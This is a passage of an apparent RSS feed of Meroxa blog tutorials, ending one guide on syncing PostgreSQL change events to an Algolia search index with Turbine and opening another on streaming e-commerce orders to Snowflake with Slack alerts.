&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;dev_users&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;updateIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; payload &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; before&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; op &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; payload

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;r&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;c&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;||&lt;/span&gt; op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;u&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;op&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;objectID &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; index
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;saveObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;saved &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; after
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error saving &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;throw&lt;/span&gt; err
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;op &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;d&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;operation: d, id: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; index
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;deleteObject&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;then&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;deleted &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; before
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;catch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;err&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                console&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;error deleting &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;before&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
                &lt;span class=&quot;token keyword&quot;&gt;throw&lt;/span&gt; err
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// exports&lt;/span&gt;
module&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;exports &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    updateIndex&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This method will call &lt;a href=&quot;https://www.algolia.com/doc/api-reference/api-methods/save-objects/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;saveObject&lt;/code&gt;&lt;/a&gt; if the record was created or updated, and &lt;a href=&quot;https://www.algolia.com/doc/api-reference/api-methods/delete-objects/&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;deleteObject&lt;/code&gt;&lt;/a&gt; if the record was deleted. This keeps Algolia in sync with your data infrastructure.&lt;/p&gt;
&lt;h3&gt;Secrets&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#secrets&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;You will need to update the Algolia credentials (&lt;code class=&quot;language-text&quot;&gt;ALGOLIA_APP_ID&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;ALGOLIA_API_KEY&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;ALGOLIA_INDEX&lt;/code&gt;) with your own values.&lt;/p&gt;
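&lt;p&gt;One straightforward way to supply these for local runs (an assumption on my part, not the only option) is through environment variables whose names match the config shown earlier; the values below are placeholders:&lt;/p&gt;

```shell
# Placeholder values — replace with your real Algolia credentials.
export ALGOLIA_APP_ID="YOUR_APP_ID"
export ALGOLIA_API_KEY="YOUR_API_KEY"
export ALGOLIA_INDEX="dev_users"
```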
&lt;h2&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine uses &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data infrastructure&lt;/a&gt; locally. This lets you test your application without connecting to real infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize them for your application, edit the files in the &lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
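&lt;p&gt;To make the record shape concrete, here is a sketch of a CDC-style record like the ones &lt;code class=&quot;language-text&quot;&gt;updateIndex&lt;/code&gt; destructures. The field values are invented for illustration; the authoritative fixture schema is in the Turbine documentation linked above:&lt;/p&gt;

```javascript
// Hypothetical fixture-style record for a create ('c') operation.
// Field names mirror what updateIndex destructures; values are made up.
const record = {
  value: {
    payload: {
      before: null,                            // row state before the change (none on create)
      after: { id: 42, name: 'Ada Lovelace' }, // row state after the change
      op: 'c',                                 // 'r' = read, 'c' = create, 'u' = update, 'd' = delete
    },
  },
};

// The same destructuring updateIndex performs:
const { payload } = record.value;
const { before, after, op } = payload;
console.log(op, after.id); // prints: c 42
```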
&lt;h3&gt;Verifying&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#verifying&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;You can verify that your data application succeeded by checking the data in the Algolia index specified in the &lt;code class=&quot;language-text&quot;&gt;updateIndex&lt;/code&gt; function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; client &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;algoliasearch&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_ID&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;APPLICATION_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; index &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;initIndex&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;dev_users&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform that runs your Turbine apps. It maintains the connection to your database and executes your application as changes occur. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create postgresql &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, as changes are made to the upstream data infrastructure, your data application will be executed.&lt;/p&gt;
&lt;h2&gt;What&apos;s next?&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-search-indexing-with-turbine-and-algolia#whats-next&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;In this guide, we have covered the basics of how to build a data application and deploy it to Meroxa. This application will move data from your PostgreSQL database to your Algolia index.&lt;/p&gt;
&lt;p&gt;Here are some additional resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine&quot;&gt;Real-time Data Lake Ingestion with Turbine&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine&quot;&gt;Real-time eCommerce Order Data Warehousing and Alerting with Turbine&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I can&apos;t wait to see what you build 🚀. If you have any questions or feedback: &lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-time eCommerce Order Data Warehousing and Alerting with Turbine]]></title><description><![CDATA[Use Turbine, Meroxa's stream processing application framework, to perform real-time e-commerce order data warehousing and alerting.]]></description><link>https://meroxa.com/blog/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine</guid><dc:creator><![CDATA[Taron Foxworth]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:50:00 GMT</pubDate><content:encoded>&lt;p&gt;Data warehouses like &lt;a href=&quot;https://www.snowflake.com/data-warehousing-glossary/data-warehousing/&quot;&gt;Snowflake&lt;/a&gt; allow you to collect and store data from multiple sources so that it can be accessed and analyzed. Real-time data warehousing is essential for e-commerce because it allows for up-to-the-minute analysis of customer behavior. In addition, the same data can be used to generate alerts about successful orders or potential fraud.&lt;/p&gt;
&lt;p&gt;An approach often used to solve this problem is to combine two entirely different tools: one to ingest data into the warehouse, and another that uses reverse ETL to drive alerting from the data in the warehouse itself. However, this setup is difficult to maintain and can be costly.&lt;/p&gt;
&lt;p&gt;Instead, you can use just Turbine to perform both real-time warehousing and alerting to Slack.&lt;/p&gt;
&lt;p&gt;Here is what a Turbine Application looks like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;pg&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sendAlert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;snowflake&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

        &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;customerOrders&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This application uses &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/setup&quot;&gt;JavaScript&lt;/a&gt;, but Turbine also has &lt;a href=&quot;https://docs.meroxa.com/turbine/python/setup&quot;&gt;Python&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/go/setup&quot;&gt;Go&lt;/a&gt;, and &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;Ruby&lt;/a&gt; libraries.&lt;/p&gt;
&lt;p&gt;Here is a quick overview of the steps we will take to get started:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How it works&lt;/li&gt;
&lt;li&gt;Setup&lt;/li&gt;
&lt;li&gt;Data Application Entrypoint&lt;/li&gt;
&lt;li&gt;Running&lt;/li&gt;
&lt;li&gt;Deployment&lt;/li&gt;
&lt;li&gt;What&apos;s next?&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;How it works&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine#how-it-works&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A data application responds to events from your data infrastructure. You can learn more about the anatomy of a JavaScript data application in the &lt;a href=&quot;https://docs.meroxa.com/turbine/javascript/overview&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://docs.meroxa.com/assets/images/real-time-ecommerce-order-data-warehousing-and-alerting-with-turbine-e6ab5a1ed3f2bf015fa12992bd336d88.png&quot; alt=&quot;Application Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;This data application will:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Listen to &lt;a href=&quot;https://medium.com/meroxa/stream-your-database-changes-with-change-data-capture-aa8797fa9070&quot;&gt;Create, Update, and Delete&lt;/a&gt; events from a Postgres database. This is where the orders are stored.&lt;/li&gt;
&lt;li&gt;Write the order data to Snowflake.&lt;/li&gt;
